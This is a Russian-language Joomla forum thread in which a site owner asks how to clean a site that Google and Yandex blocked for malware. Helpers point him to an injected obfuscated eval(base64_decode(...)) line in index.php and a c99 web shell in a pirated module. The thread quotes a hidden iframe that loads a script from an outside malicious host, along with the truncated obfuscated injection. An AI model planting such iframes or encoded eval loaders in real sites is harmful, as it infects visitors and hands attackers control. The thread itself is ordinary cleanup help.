Сайт заблокирован из-за вируса - Безопасность сайтов на Joomla

Уезжал на месяц, не было возможности контролить сайт, по возвращении обнаружил, что по некоторым запросам он попал в топ 10 на первые места (в гугле). wtf? продвижением не занимался. но проблема в другом, через пару дней Chrome обнаружил вирус на сайте и заблокировал его. Google пишет, что возможно этот код <iframe src="http://lmhufaz.ftp1.biz/ip/stat.php" width=1 he
ight=1 style="visibility: hidden"> но найти эту строку через notepad+ не удается. онлайн сканеры ругаются , но понять, где искать не могу. вскоре и Яндекс заблокировал сайт, но в его разделе безопасность - 0 пользы, одна лирика.
поменял все пароли, запросил у хостера бэкап, установил JHackGuard и Eyesite. подскажите, что делать дальше (в бэкдорах ничего подозрительного не нашел)

Вам нужно для начала скачать весь сайт к себе на компьютер и прогнать его антивирусом, попробуйте Касперским он даже не пускает на ваш сайт (HEUR:Trojan.Script.Generic), скорее всего зараза засела в каком то java скрипте.

каспер ничего не нашел. в корень сайта залил еще одну утилиту для проверку шелов
вот отчет пример одной и десяток строк
/var/www/u2685724/data/www/dent-plus.ru/index.php
ONSE */ $JResp = JResponse::toString($mainframe->getCfg('gzip')); /*rrt*/ |eval(base64_decode("JHVybCAgICAgICA9ICdodHRwOi8vd29yZHByZXNzdGVzdDIuaW5mby8

надо теперь через phpadmin это удалять?

Замени этот index.php или
удали строку после 88 ,echo JResponse::toString($mainframe->getCfg('gzip'));
И смотри такой код в index.php шаблонов
п.с.
Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99

хостер дал вот этот скрипт еще.
есть такой пункт как "Директории, доступные скрипту на запись". указано, что подпапки libraries, includes, templates, editors? components и т.д открыты на запись и это не безопасно. а разве можно выставить на большинство папок в корне сайта атрибут 444? тогда ведь админка не будет корректно работать


[вложение удалено Администратором]

Замени этот index.php или
удали строку после 88 ,echo JResponse::toString($mainframe->getCfg('gzip'));
И смотри такой код в index.php шаблонов
п.с.
Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99

ок. сделал.
а есть какой-нибудь мануал по использованию fls?
вроде бы ничего левого нет

Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99

ТС!! такой простой модуль и то умудрились скачать с варезника что-ли?)))
он же бесплатный))) http://extensions.joomla.org/extensions/core-enhancements/coding-a-scripts-integration/custom-code-in-modules/3668

ТС!! такой простой модуль и то умудрились скачать с варезника что-ли?)))
он же бесплатный))) http://extensions.joomla.org/extensions/core-enhancements/coding-a-scripts-integration/custom-code-in-modules/3668

это мой первый сайт на юмле, тогда качал не вникая откуда (facepalm), впоследствии оставил не более 10% загруженных компонентов
я думал, что если с админки модуль удалить, то он вообще больше нигде не сохраняется

т.е. вирусный код проник через mod_blank?

Может тут мне помогут?
Google не давал попасть на сайт, по причине вредоносного кода, после переливки всей Joomla сайт стал доступен и работает отлично.
Проблема осталась в панели администратора, вирус остался и в ней, только не могу определить где. Так же не работает меню в панели управления.
Тема уже создана тут http://joomlaforum.ru/index.php/topic,229934.msg1281219.html#msg1281219

@mrGreek
если вы считаете что у вас вирус почитайте топик
http://joomlaforum.ru/index.php/topic,246899.0.html